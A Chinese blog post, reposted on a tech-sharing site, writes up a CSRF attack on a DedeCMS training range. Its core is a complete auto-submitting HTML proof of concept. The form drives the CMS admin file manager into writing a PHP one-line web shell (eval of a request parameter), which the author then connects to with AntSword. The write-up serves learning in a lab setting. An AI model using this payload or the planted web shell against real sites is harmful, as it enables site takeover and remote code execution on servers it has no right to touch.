标签:一次 网站 学习 黑客 cookie csrf 靶场 数据包
CSRF(Cross-site request forgery)跨站请求伪造。就是盗用cookie,但不是盗取cookie。
假设黑客知道A已经登录过网站a,并且网站a保存了A的cookie,下次打开的时候就不用再次登录,(如b站那种)。或者是A已经打开过一个网站,并登录了。
黑客做了一个网页,里面有csrf,这个时候,黑客诱导A点开了他做的网页,这个时候就会触发csrf,从而修改网站a的内容。
比较好执行csrf的是用cms搭建的网站,因为cms源码是固定的,所以数据包可以构建。
任何的网站功能(互联网)的本质都是数据包的传递。
以掌控安全的靶场为例:(目标是新建带一句话木马的文件)
因为靶场使用的是dedecms,所以我们先进行本地测试。(搭建一个dedecms)
进入后台
因为在新建文件的时候也是会有数据包传输的,所以我们进行抓包
得到了一下数据包内容
这里就可以知道新建文件的数据包是什么结构了。那个str的内容是我最帅ulr编码后的内容。至于B1是什么东西,我也不知道。
现在进行构造,
得到了
这里要把token去掉。
再根据靶场的实际情况进行更改就行了。结果如下
<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form id='a' action="http://目标域名或ip/newcsrf/dede/file_manage_control.php" method="POST"> <input type="hidden" name="fmdo" value="edit" /> <input type="hidden" name="backurl" value="" /> <input type="hidden" name="activepath" value="/newcsrf/uploads/" /> <input type="hidden" name="filename" value="wzx.php" /> <input type="hidden" name="str" value="<?php eval($_REQUEST['w']);?>" /> <input type="hidden" name="B1" value="  保 å­˜  " /> <input type="submit" value="Submit request" /> </form> <script> document.getElementById('a').submit(); </script> </body> </html>
因为要成功执行的话需要点击,所以在最后面加了个自动点击功能。
因为我没有公网ip,所以靶场提供了一个上传的功能,上传后提供文件地址,然后让机器人自动点击,来达到漏洞执行的目的。
然后就可以看到一个带有一句话木马的文件上传到他的网站目录里了。
接下来用蚁剑连接就行了。
标签:一次,网站,学习,黑客,cookie,csrf,靶场,数据包 来源: https://www.cnblogs.com/v2ish1yan/p/16125246.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。